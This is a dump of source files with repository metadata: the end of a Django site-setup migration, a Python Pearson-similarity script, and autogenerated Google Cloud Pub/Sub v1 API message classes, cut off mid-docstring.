This is the sample application created and deployed from the Crowdbotics app.
You can view list of packages selected for this application below.
</p>"""
HomePage.objects.create(body=homepage_body)
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "layouteditor151-1654.botics.co"
site_params = {
"name": "layouteditor151",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("home", "0001_initial"),
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_customtext),
migrations.RunPython(create_homepage),
migrations.RunPython(create_site),
]
| [
"[email protected]"
] | |
119c672f5d02ac1dc65310e156c212718e05ac89 | d838bed08a00114c92b73982a74d96c15166a49e | /docs/data/learn/Bioinformatics/output/ch8_code/src/metrics/PearsonSimilarity.py | aae4c9870689ccc0776b67c2e785b313c5e05669 | [] | no_license | offbynull/offbynull.github.io | 4911f53d77f6c59e7a453ee271b1e04e613862bc | 754a85f43159738b89dd2bde1ad6ba0d75f34b98 | refs/heads/master | 2023-07-04T00:39:50.013571 | 2023-06-17T20:27:05 | 2023-06-17T23:27:00 | 308,482,936 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,725 | py | from math import sqrt
from statistics import mean
from sys import stdin
from typing import Sequence
import yaml
# MARKDOWN
def pearson_similarity(v: Sequence[float], w: Sequence[float], dims: int):
v_avg = mean(v)
w_avg = mean(w)
vec_avg_diffs_dp = sum((v[i] - v_avg) * (w[i] - w_avg) for i in range(dims))
dist_to_v_avg = sqrt(sum((v[i] - v_avg) ** 2 for i in range(dims)))
dist_to_w_avg = sqrt(sum((w[i] - w_avg) ** 2 for i in range(dims)))
return vec_avg_diffs_dp / (dist_to_v_avg * dist_to_w_avg)
def pearson_distance(v: Sequence[float], w: Sequence[float], dims: int):
# To turn pearson similarity into a distance metric, subtract 1.0 from it. By
# subtracting 1.0, you're changing the bounds from [1.0, -1.0] to [0.0, 2.0].
#
# Recall that any distance metric must return 0 when the items being compared
# are the same and increases the more different they get. By subtracting 1.0,
# you're matching that distance metric requirement: 0.0 when totally similar
# and 2.0 for totally dissimilar.
return 1.0 - pearson_similarity(v, w, dims)
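# For instance, pearson_distance([1, 2, 3], [2, 4, 6], 3) is ~0.0 because the vectors
# are perfectly correlated, while perfectly anti-correlated vectors (e.g. [1, 2, 3]
# and [3, 2, 1]) give a distance of ~2.0 (illustrative values).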
# MARKDOWN
def main():
print("<div style=\"border:1px solid black;\">", end="\n\n")
print("`{bm-disable-all}`", end="\n\n")
try:
data = yaml.safe_load(stdin)
v = data[0]
w = data[1]
dims = max(len(v), len(w))
print('Given the vectors ...')
print()
print(f' * {v}')
print(f' * {w}')
print()
d = pearson_similarity(v, w, dims)
print(f'Their pearson similarity is {d}')
print()
finally:
print("</div>", end="\n\n")
print("`{bm-enable-all}`", end="\n\n")
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
1c77dba5905a2cb966626324f46fa89f88fbd802 | e8c31e1c1e667429509783682fc1d4da8ad816e7 | /exec -l /bin/bash/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/pubsub/v1/pubsub_v1_messages.py | 875964c1532fd14fbfebbcd91aa8a80009d46674 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | amaclean2/TheLessonBox | 432008fd05db0473e4c3ddb6fb326ac31542ce81 | 593b60832bf95d3b92dd711b05d4d992d3f279a5 | refs/heads/master | 2020-04-30T17:56:16.006932 | 2019-04-10T04:36:13 | 2019-04-10T04:36:13 | 176,994,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53,925 | py | """Generated message classes for pubsub version v1.
Provides reliable, many-to-many, asynchronous messaging between applications.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
package = 'pubsub'
class AcknowledgeRequest(_messages.Message):
r"""Request for the Acknowledge method.
Fields:
ackIds: The acknowledgment ID for the messages being acknowledged that was
returned by the Pub/Sub system in the `Pull` response. Must not be
empty.
"""
ackIds = _messages.StringField(1, repeated=True)
class Binding(_messages.Message):
r"""Associates `members` with a `role`.
Fields:
condition: The condition that is associated with this binding. NOTE: an
unsatisfied condition will not allow user access via current binding.
Different bindings, including their conditions, are examined
independently.
members: Specifies the identities requesting access for a Cloud Platform
resource. `members` can have the following values: * `allUsers`: A
special identifier that represents anyone who is on the internet;
with or without a Google account. * `allAuthenticatedUsers`: A special
identifier that represents anyone who is authenticated with a Google
account or a service account. * `user:{emailid}`: An email address that
represents a specific Google account. For example, `[email protected]`
. * `serviceAccount:{emailid}`: An email address that represents a
service account. For example, `my-other-
[email protected]`. * `group:{emailid}`: An email address
that represents a Google group. For example, `[email protected]`.
* `domain:{domain}`: The G Suite domain (primary) that represents all
the users of that domain. For example, `google.com` or `example.com`.
role: Role that is assigned to `members`. For example, `roles/viewer`,
`roles/editor`, or `roles/owner`.
"""
condition = _messages.MessageField('Expr', 1)
members = _messages.StringField(2, repeated=True)
role = _messages.StringField(3)
class CreateSnapshotRequest(_messages.Message):
r"""Request for the `CreateSnapshot` method.
Messages:
LabelsValue: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
Fields:
labels: See <a href="https://cloud.google.com/pubsub/docs/labels">
Creating and managing labels</a>.
subscription: The subscription whose backlog the snapshot retains.
Specifically, the created snapshot is guaranteed to retain: (a) The
existing backlog on the subscription. More precisely, this is
defined as the messages in the subscription's backlog that are
unacknowledged upon the successful completion of the
`CreateSnapshot` request; as well as: (b) Any messages published to the
subscription's topic following the successful completion of the
CreateSnapshot request. Format is
`projects/{project}/subscriptions/{sub}`.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""See <a href="https://cloud.google.com/pubsub/docs/labels"> Creating
and managing labels</a>.
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
labels = _messages.MessageField('LabelsValue', 1)
subscription = _messages.StringField(2)
class Empty(_messages.Message):
r"""A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to use it as the request
or the response type of an API method. For instance: service Foo {
rpc Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The
JSON representation for `Empty` is empty JSON object `{}`.
"""
class ExpirationPolicy(_messages.Message):
r"""A policy that specifies the conditions for resource expiration (i.e.,
automatic resource deletion).
Fields:
ttl: Specifies the "time-to-live" duration for an associated resource. The
resource expires if it is not active for a period of `ttl`. The
definition of "activity" depends on the type of the associated resource.
The minimum and maximum allowed values for `ttl` depend on the type of
the associated resource, as well. If `ttl` is not set, the associated
resource never expires.
"""
ttl = _messages.StringField(1)
class Expr(_messages.Message):
r"""Represents an expression text. Example: title: "User account
presence" description: "Determines whether the request has a user
account" expression: "size(request.user) > 0"
Fields:
description: An optional description of the expression. This is a longer
text which describes the expression, e.g. when hovered over it in a UI.
expression: Textual representation of an expression in Common Expression
Language syntax. The application context of the containing message
determines which well-known feature set of CEL is supported.
location: An optional string indicating the location of the expression for
error reporting, e.g. a file name and a position in the file.
title: An optional title for the expression, i.e. a short string
describing its purpose. This can be used e.g. in UIs which allow to
enter the expression.
"""
description = _messages.StringField(1)
expression = _messages.StringField(2)
location = _messages.StringField(3)
title = _messages.StringField(4)
class ListSnapshotsResponse(_messages.Message):
r"""Response for the `ListSnapshots` method.
Fields:
nextPageToken: If not empty, indicates that there may be more snapshot
that match the request; this value should be passed in a new
`ListSnapshotsRequest`.
snapshots: The resulting snapshots.
"""
nextPageToken = _messages.StringField(1)
snapshots = _messages.MessageField('Snapshot', 2, repeated=True)
class ListSubscriptionsResponse(_messages.Message):
r"""Response for the `ListSubscriptions` method.
Fields:
nextPageToken: If not empty, indicates that there may be more
subscriptions that match the request; this value should be passed in a
new `ListSubscriptionsRequest` to get more subscriptions.
subscriptions: The subscriptions that match the request.
"""
nextPageToken = _messages.StringField(1)
subscriptions = _messages.MessageField('Subscription', 2, repeated=True)
class ListTopicSnapshotsResponse(_messages.Message):
r"""Response for the `ListTopicSnapshots` method.
Fields:
nextPageToken: If not empty, indicates that there may be more snapshots
that match the request; this value should be passed in a new
`ListTopicSnapshotsRequest` to get more snapshots.
snapshots: The names of the snapshots that match the request.
"""
nextPageToken = _messages.StringField(1)
snapshots = _messages.StringField(2, repeated=True)
class ListTopicSubscriptionsResponse(_messages.Message):
r"""Response for the `ListTopicSubscriptions` method.
Fields:
nextPageToken: If not empty, indicates that there may be more
subscriptions that match the request; this value should be passed in a
new `ListTopicSubscriptionsRequest` to get more subscriptions.
subscriptions: The names of the subscriptions that match the request.
"""
nextPageToken = _messages.StringField(1)
subscriptions = _messages.StringField(2, repeated=True)
class ListTopicsResponse(_messages.Message):
r"""Response for the `ListTopics` method.
Fields:
nextPageToken: If not empty, indicates that there may be more topics that
match the request; this value should be passed in a new
`ListTopicsRequest`.
topics: The resulting topics.
"""
nextPageToken = _messages.StringField(1)
topics = _messages.MessageField('Topic', 2, repeated=True)
class MessageStoragePolicy(_messages.Message):
r"""A MessageStoragePolicy object.
Fields:
allowedPersistenceRegions: The list of GCP region IDs where messages that
are published to the topic may be persisted in storage. Messages
published by publishers running in non-allowed GCP regions (or running
outside of GCP altogether) will be routed for storage in one of the
allowed regions. An empty list indicates a misconfiguration at the
project or organization level, which will result in all Publish
operations failing.
"""
allowedPersistenceRegions = _messages.StringField(1, repeated=True)
class ModifyAckDeadlineRequest(_messages.Message):
r"""Request for the ModifyAckDeadline method.
Fields:
ackDeadlineSeconds: The new ack deadline with respect to the time this
request was sent to the Pub/Sub system. For example, if the value is 10,
the new ack deadline will expire 10 seconds after the
`ModifyAckDeadline` call was made. Specifying zero might immediately
make the message available for delivery to another subscriber client.
This typically results in an increase in the rate of message
redeliveries (that is, duplicates). The minimum deadline you can specify
is 0 seconds. The maximum deadline you can specify is 600 seconds (10
minutes).
ackIds: List of acknowledgment IDs.
"""
ackDeadlineSeconds = _messages.IntegerField(1, variant=_messages.Variant.INT32)
ackIds = _messages.StringField(2, repeated=True)
class ModifyPushConfigRequest(_messages.Message):
r"""Request for the ModifyPushConfig method.
Fields:
pushConfig: The push configuration for future deliveries. An empty
`pushConfig` indicates that the Pub/Sub system should stop pushing
messages from the given subscription and allow messages to be pulled and
acknowledged - effectively pausing the subscription if `Pull` or
`StreamingPull` is not called.
"""
pushConfig = _messages.MessageField('PushConfig', 1)
class OidcToken(_messages.Message):
r"""Contains information needed for generating an [OpenID Connect
token](https://developers.google.com/identity/protocols/OpenIDConnect).
Fields:
audience: Audience to be used when generating OIDC token. The audience
claim identifies the recipients that the JWT is intended for. The
audience value is a single case-sensitive string. Having multiple values
(array) for the audience field is not supported. More info about the
OIDC JWT token audience here:
https://tools.ietf.org/html/rfc7519#section-4.1.3 Note: if not
specified, the Push endpoint URL will be used.
serviceAccountEmail: [Service account
email](https://cloud.google.com/iam/docs/service-accounts) to be used
for generating the OIDC token. The caller (for CreateSubscription,
UpdateSubscription, and ModifyPushConfig RPCs) must have the
iam.serviceAccounts.actAs permission for the service account.
"""
audience = _messages.StringField(1)
serviceAccountEmail = _messages.StringField(2)
class Policy(_messages.Message):
r"""Defines an Identity and Access Management (IAM) policy. It is used to
specify access control policies for Cloud Platform resources. A `Policy`
consists of a list of `bindings`. A `binding` binds a list of `members` to a
`role`, where the members can be user accounts, Google groups, Google
domains, and service accounts. A `role` is a named list of permissions
defined by IAM. **JSON Example** { "bindings": [ {
"role": "roles/owner", "members": [
"user:[email protected]", "group:[email protected]",
"domain:google.com", "serviceAccount:my-other-
[email protected]" ] }, {
"role": "roles/viewer", "members": ["user:[email protected]"]
} ] } **YAML Example** bindings: - members: -
user:[email protected] - group:[email protected] -
domain:google.com - serviceAccount:my-other-
[email protected] role: roles/owner - members:
- user:[email protected] role: roles/viewer For a description of IAM
and its features, see the [IAM developer's
guide](https://cloud.google.com/iam/docs).
Fields:
bindings: Associates a list of `members` to a `role`. `bindings` with no
members will result in an error.
etag: `etag` is used for optimistic concurrency control as a way to help
prevent simultaneous updates of a policy from overwriting each other. It
is strongly suggested that systems make use of the `etag` in the read-
modify-write cycle to perform policy updates in order to avoid race
conditions: An `etag` is returned in the response to `getIamPolicy`, and
systems are expected to put that etag in the request to `setIamPolicy`
to ensure that their change will be applied to the same version of the
policy. If no `etag` is provided in the call to `setIamPolicy`, then
the existing policy is overwritten blindly.
version: Deprecated.
"""
bindings = _messages.MessageField('Binding', 1, repeated=True)
etag = _messages.BytesField(2)
version = _messages.IntegerField(3, variant=_messages.Variant.INT32)
class PublishRequest(_messages.Message):
r"""Request for the Publish method.
Fields:
messages: The messages to publish.
"""
messages = _messages.MessageField('PubsubMessage', 1, repeated=True)
class PublishResponse(_messages.Message):
r"""Response for the `Publish` method.
Fields:
messageIds: The server-assigned ID of each published message, in the same
order as the messages in the request. IDs are guaranteed to be unique
within the topic.
"""
messageIds = _messages.StringField(1, repeated=True)
class PubsubMessage(_messages.Message):
r"""A message that is published by publishers and consumed by subscribers.
The message must contain either a non-empty data field or at least one
attribute. Note that client libraries represent this object differently
depending on the language. See the corresponding <a
href="https://cloud.google.com/pubsub/docs/reference/libraries">client
library documentation</a> for more information. See <a
href="https://cloud.google.com/pubsub/quotas">Quotas and limits</a> for more
information about message limits.
Messages:
AttributesValue: Optional attributes for this message.
Fields:
attributes: Optional attributes for this message.
data: The message data field. If this field is empty, the message must
contain at least one attribute.
messageId: ID of this message, assigned by the server when the message is
published. Guaranteed to be unique within the topic. This value may be
read by a subscriber that receives a `PubsubMessage` via a `Pull` call
or a push delivery. It must not be populated by the publisher in a
`Publish` call.
publishTime: The time at which the message was published, populated by the
server when it receives the `Publish` call. It must not be populated by
the publisher in a `Publish` call.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class AttributesValue(_messages.Message):
r"""Optional attributes for this message.
Messages:
AdditionalProperty: An additional property for a AttributesValue object.
Fields:
additionalProperties: Additional properties of type AttributesValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a AttributesValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
attributes = _messages.MessageField('AttributesValue', 1)
data = _messages.BytesField(2)
messageId = _messages.StringField(3)
publishTime = _messages.StringField(4)
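
# Illustrative sketch only: per the docstring above, a PubsubMessage must carry
# a non-empty `data` payload or at least one attribute. The attribute key and
# value here are arbitrary examples.
def _examplePubsubMessage():
  """Build a message with both payload bytes and one custom attribute."""
  attrs = PubsubMessage.AttributesValue(additionalProperties=[
      PubsubMessage.AttributesValue.AdditionalProperty(
          key='origin', value='example')])
  return PubsubMessage(data=b'hello world', attributes=attrs)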
class PubsubProjectsSnapshotsCreateRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsCreateRequest object.
Fields:
createSnapshotRequest: A CreateSnapshotRequest resource to be passed as
the request body.
name: Optional user-provided name for this snapshot. If the name is not
provided in the request, the server will assign a random name for this
snapshot on the same project as the subscription. Note that for REST API
requests, you must specify a name. See the <a
href="https://cloud.google.com/pubsub/docs/admin#resource_names">
resource name rules</a>. Format is
`projects/{project}/snapshots/{snap}`.
"""
createSnapshotRequest = _messages.MessageField('CreateSnapshotRequest', 1)
name = _messages.StringField(2, required=True)
class PubsubProjectsSnapshotsDeleteRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsDeleteRequest object.
Fields:
snapshot: The name of the snapshot to delete. Format is
`projects/{project}/snapshots/{snap}`.
"""
snapshot = _messages.StringField(1, required=True)
class PubsubProjectsSnapshotsGetIamPolicyRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsGetIamPolicyRequest object.
Fields:
resource: REQUIRED: The resource for which the policy is being requested.
See the operation documentation for the appropriate value for this
field.
"""
resource = _messages.StringField(1, required=True)
class PubsubProjectsSnapshotsGetRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsGetRequest object.
Fields:
snapshot: The name of the snapshot to get. Format is
`projects/{project}/snapshots/{snap}`.
"""
snapshot = _messages.StringField(1, required=True)
class PubsubProjectsSnapshotsListRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsListRequest object.
Fields:
pageSize: Maximum number of snapshots to return.
pageToken: The value returned by the last `ListSnapshotsResponse`;
indicates that this is a continuation of a prior `ListSnapshots` call,
and that the system should return the next page of data.
project: The name of the project in which to list snapshots. Format is
`projects/{project-id}`.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
project = _messages.StringField(3, required=True)
class PubsubProjectsSnapshotsPatchRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsPatchRequest object.
Fields:
name: The name of the snapshot.
updateSnapshotRequest: A UpdateSnapshotRequest resource to be passed as
the request body.
"""
name = _messages.StringField(1, required=True)
updateSnapshotRequest = _messages.MessageField('UpdateSnapshotRequest', 2)
class PubsubProjectsSnapshotsSetIamPolicyRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsSetIamPolicyRequest object.
Fields:
resource: REQUIRED: The resource for which the policy is being specified.
See the operation documentation for the appropriate value for this
field.
setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the
request body.
"""
resource = _messages.StringField(1, required=True)
setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2)
class PubsubProjectsSnapshotsTestIamPermissionsRequest(_messages.Message):
r"""A PubsubProjectsSnapshotsTestIamPermissionsRequest object.
Fields:
resource: REQUIRED: The resource for which the policy detail is being
requested. See the operation documentation for the appropriate value for
this field.
testIamPermissionsRequest: A TestIamPermissionsRequest resource to be
passed as the request body.
"""
resource = _messages.StringField(1, required=True)
testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2)
class PubsubProjectsSubscriptionsAcknowledgeRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsAcknowledgeRequest object.
Fields:
acknowledgeRequest: A AcknowledgeRequest resource to be passed as the
request body.
subscription: The subscription whose message is being acknowledged. Format
is `projects/{project}/subscriptions/{sub}`.
"""
acknowledgeRequest = _messages.MessageField('AcknowledgeRequest', 1)
subscription = _messages.StringField(2, required=True)
class PubsubProjectsSubscriptionsDeleteRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsDeleteRequest object.
Fields:
subscription: The subscription to delete. Format is
`projects/{project}/subscriptions/{sub}`.
"""
subscription = _messages.StringField(1, required=True)
class PubsubProjectsSubscriptionsGetIamPolicyRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsGetIamPolicyRequest object.
Fields:
resource: REQUIRED: The resource for which the policy is being requested.
See the operation documentation for the appropriate value for this
field.
"""
resource = _messages.StringField(1, required=True)
class PubsubProjectsSubscriptionsGetRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsGetRequest object.
Fields:
subscription: The name of the subscription to get. Format is
`projects/{project}/subscriptions/{sub}`.
"""
subscription = _messages.StringField(1, required=True)
class PubsubProjectsSubscriptionsListRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsListRequest object.
Fields:
pageSize: Maximum number of subscriptions to return.
pageToken: The value returned by the last `ListSubscriptionsResponse`;
indicates that this is a continuation of a prior `ListSubscriptions`
call, and that the system should return the next page of data.
project: The name of the project in which to list subscriptions. Format is
`projects/{project-id}`.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
project = _messages.StringField(3, required=True)
class PubsubProjectsSubscriptionsModifyAckDeadlineRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsModifyAckDeadlineRequest object.
Fields:
modifyAckDeadlineRequest: A ModifyAckDeadlineRequest resource to be passed
as the request body.
subscription: The name of the subscription. Format is
`projects/{project}/subscriptions/{sub}`.
"""
modifyAckDeadlineRequest = _messages.MessageField('ModifyAckDeadlineRequest', 1)
subscription = _messages.StringField(2, required=True)
class PubsubProjectsSubscriptionsModifyPushConfigRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsModifyPushConfigRequest object.
Fields:
modifyPushConfigRequest: A ModifyPushConfigRequest resource to be passed
as the request body.
subscription: The name of the subscription. Format is
`projects/{project}/subscriptions/{sub}`.
"""
modifyPushConfigRequest = _messages.MessageField('ModifyPushConfigRequest', 1)
subscription = _messages.StringField(2, required=True)
class PubsubProjectsSubscriptionsPatchRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsPatchRequest object.
Fields:
name: The name of the subscription. It must have the format
`"projects/{project}/subscriptions/{subscription}"`. `{subscription}`
must start with a letter, and contain only letters (`[A-Za-z]`), numbers
(`[0-9]`), dashes (`-`), underscores (`_`), periods (`.`), tildes (`~`),
plus (`+`) or percent signs (`%`). It must be between 3 and 255
characters in length, and it must not start with `"goog"`.
updateSubscriptionRequest: A UpdateSubscriptionRequest resource to be
passed as the request body.
"""
name = _messages.StringField(1, required=True)
updateSubscriptionRequest = _messages.MessageField('UpdateSubscriptionRequest', 2)
class PubsubProjectsSubscriptionsPullRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsPullRequest object.
Fields:
pullRequest: A PullRequest resource to be passed as the request body.
subscription: The subscription from which messages should be pulled.
Format is `projects/{project}/subscriptions/{sub}`.
"""
pullRequest = _messages.MessageField('PullRequest', 1)
subscription = _messages.StringField(2, required=True)
class PubsubProjectsSubscriptionsSeekRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsSeekRequest object.
Fields:
seekRequest: A SeekRequest resource to be passed as the request body.
subscription: The subscription to affect.
"""
seekRequest = _messages.MessageField('SeekRequest', 1)
subscription = _messages.StringField(2, required=True)
class PubsubProjectsSubscriptionsSetIamPolicyRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsSetIamPolicyRequest object.
Fields:
resource: REQUIRED: The resource for which the policy is being specified.
See the operation documentation for the appropriate value for this
field.
setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the
request body.
"""
resource = _messages.StringField(1, required=True)
setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2)
class PubsubProjectsSubscriptionsTestIamPermissionsRequest(_messages.Message):
r"""A PubsubProjectsSubscriptionsTestIamPermissionsRequest object.
Fields:
resource: REQUIRED: The resource for which the policy detail is being
requested. See the operation documentation for the appropriate value for
this field.
testIamPermissionsRequest: A TestIamPermissionsRequest resource to be
passed as the request body.
"""
resource = _messages.StringField(1, required=True)
testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2)
class PubsubProjectsTopicsDeleteRequest(_messages.Message):
r"""A PubsubProjectsTopicsDeleteRequest object.
Fields:
topic: Name of the topic to delete. Format is
`projects/{project}/topics/{topic}`.
"""
topic = _messages.StringField(1, required=True)
class PubsubProjectsTopicsGetIamPolicyRequest(_messages.Message):
r"""A PubsubProjectsTopicsGetIamPolicyRequest object.
Fields:
resource: REQUIRED: The resource for which the policy is being requested.
See the operation documentation for the appropriate value for this
field.
"""
resource = _messages.StringField(1, required=True)
class PubsubProjectsTopicsGetRequest(_messages.Message):
r"""A PubsubProjectsTopicsGetRequest object.
Fields:
topic: The name of the topic to get. Format is
`projects/{project}/topics/{topic}`.
"""
topic = _messages.StringField(1, required=True)
class PubsubProjectsTopicsListRequest(_messages.Message):
r"""A PubsubProjectsTopicsListRequest object.
Fields:
pageSize: Maximum number of topics to return.
pageToken: The value returned by the last `ListTopicsResponse`; indicates
that this is a continuation of a prior `ListTopics` call, and that the
system should return the next page of data.
project: The name of the project in which to list topics. Format is
`projects/{project-id}`.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
project = _messages.StringField(3, required=True)
class PubsubProjectsTopicsPatchRequest(_messages.Message):
r"""A PubsubProjectsTopicsPatchRequest object.
Fields:
name: The name of the topic. It must have the format
`"projects/{project}/topics/{topic}"`. `{topic}` must start with a
letter, and contain only letters (`[A-Za-z]`), numbers (`[0-9]`), dashes
(`-`), underscores (`_`), periods (`.`), tildes (`~`), plus (`+`) or
percent signs (`%`). It must be between 3 and 255 characters in length,
and it must not start with `"goog"`.
updateTopicRequest: A UpdateTopicRequest resource to be passed as the
request body.
"""
name = _messages.StringField(1, required=True)
updateTopicRequest = _messages.MessageField('UpdateTopicRequest', 2)
class PubsubProjectsTopicsPublishRequest(_messages.Message):
r"""A PubsubProjectsTopicsPublishRequest object.
Fields:
publishRequest: A PublishRequest resource to be passed as the request
body.
topic: The messages in the request will be published on this topic. Format
is `projects/{project}/topics/{topic}`.
"""
publishRequest = _messages.MessageField('PublishRequest', 1)
topic = _messages.StringField(2, required=True)
class PubsubProjectsTopicsSetIamPolicyRequest(_messages.Message):
r"""A PubsubProjectsTopicsSetIamPolicyRequest object.
Fields:
resource: REQUIRED: The resource for which the policy is being specified.
See the operation documentation for the appropriate value for this
field.
setIamPolicyRequest: A SetIamPolicyRequest resource to be passed as the
request body.
"""
resource = _messages.StringField(1, required=True)
setIamPolicyRequest = _messages.MessageField('SetIamPolicyRequest', 2)
class PubsubProjectsTopicsSnapshotsListRequest(_messages.Message):
r"""A PubsubProjectsTopicsSnapshotsListRequest object.
Fields:
pageSize: Maximum number of snapshot names to return.
pageToken: The value returned by the last `ListTopicSnapshotsResponse`;
indicates that this is a continuation of a prior `ListTopicSnapshots`
call, and that the system should return the next page of data.
topic: The name of the topic that snapshots are attached to. Format is
`projects/{project}/topics/{topic}`.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
topic = _messages.StringField(3, required=True)
class PubsubProjectsTopicsSubscriptionsListRequest(_messages.Message):
r"""A PubsubProjectsTopicsSubscriptionsListRequest object.
Fields:
pageSize: Maximum number of subscription names to return.
pageToken: The value returned by the last
`ListTopicSubscriptionsResponse`; indicates that this is a continuation
of a prior `ListTopicSubscriptions` call, and that the system should
return the next page of data.
topic: The name of the topic that subscriptions are attached to. Format is
`projects/{project}/topics/{topic}`.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
topic = _messages.StringField(3, required=True)
class PubsubProjectsTopicsTestIamPermissionsRequest(_messages.Message):
r"""A PubsubProjectsTopicsTestIamPermissionsRequest object.
Fields:
resource: REQUIRED: The resource for which the policy detail is being
requested. See the operation documentation for the appropriate value for
this field.
testIamPermissionsRequest: A TestIamPermissionsRequest resource to be
passed as the request body.
"""
resource = _messages.StringField(1, required=True)
testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2)
class PullRequest(_messages.Message):
r"""Request for the `Pull` method.
Fields:
maxMessages: The maximum number of messages returned for this request. The
Pub/Sub system may return fewer than the number specified.
    returnImmediately: If this field is set to true, the system will respond
      immediately even if there are no messages available to return in the
`Pull` response. Otherwise, the system may wait (for a bounded amount of
time) until at least one message is available, rather than returning no
messages.
"""
maxMessages = _messages.IntegerField(1, variant=_messages.Variant.INT32)
returnImmediately = _messages.BooleanField(2)
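
# Illustrative sketch only: a PullRequest as described above. maxMessages=10 is
# an arbitrary cap; returnImmediately=False lets the server wait briefly for
# messages instead of returning an empty response right away.
def _examplePullRequest():
  return PullRequest(maxMessages=10, returnImmediately=False)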
class PullResponse(_messages.Message):
r"""Response for the `Pull` method.
Fields:
receivedMessages: Received Pub/Sub messages. The list will be empty if
there are no more messages available in the backlog. For JSON, the
response can be entirely empty. The Pub/Sub system may return fewer than
the `maxMessages` requested even if there are more messages available in
the backlog.
"""
receivedMessages = _messages.MessageField('ReceivedMessage', 1, repeated=True)
class PushConfig(_messages.Message):
r"""Configuration for a push delivery endpoint.
Messages:
AttributesValue: Endpoint configuration attributes. Every endpoint has a
set of API supported attributes that can be used to control different
aspects of the message delivery. The currently supported attribute is
`x-goog-version`, which you can use to change the format of the pushed
message. This attribute indicates the version of the data expected by
the endpoint. This controls the shape of the pushed message (i.e., its
fields and metadata). The endpoint version is based on the version of
the Pub/Sub API. If not present during the `CreateSubscription` call,
      it will default to the version of the API used to make such a call. If not
present during a `ModifyPushConfig` call, its value will not be changed.
`GetSubscription` calls will always return a valid version, even if the
subscription was created without this attribute. The possible values
for this attribute are: * `v1beta1`: uses the push format defined in
the v1beta1 Pub/Sub API. * `v1` or `v1beta2`: uses the push format
defined in the v1 Pub/Sub API.
Fields:
attributes: Endpoint configuration attributes. Every endpoint has a set
of API supported attributes that can be used to control different
aspects of the message delivery. The currently supported attribute is
`x-goog-version`, which you can use to change the format of the pushed
message. This attribute indicates the version of the data expected by
the endpoint. This controls the shape of the pushed message (i.e., its
fields and metadata). The endpoint version is based on the version of
the Pub/Sub API. If not present during the `CreateSubscription` call,
      it will default to the version of the API used to make such a call. If not
present during a `ModifyPushConfig` call, its value will not be changed.
`GetSubscription` calls will always return a valid version, even if the
subscription was created without this attribute. The possible values
for this attribute are: * `v1beta1`: uses the push format defined in
the v1beta1 Pub/Sub API. * `v1` or `v1beta2`: uses the push format
defined in the v1 Pub/Sub API.
oidcToken: If specified, Pub/Sub will generate and attach an OIDC JWT
token as an `Authorization` header in the HTTP request for every pushed
message.
pushEndpoint: A URL locating the endpoint to which messages should be
pushed. For example, a Webhook endpoint might use
"https://example.com/push".
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class AttributesValue(_messages.Message):
r"""Endpoint configuration attributes. Every endpoint has a set of API
supported attributes that can be used to control different aspects of the
message delivery. The currently supported attribute is `x-goog-version`,
which you can use to change the format of the pushed message. This
attribute indicates the version of the data expected by the endpoint. This
controls the shape of the pushed message (i.e., its fields and metadata).
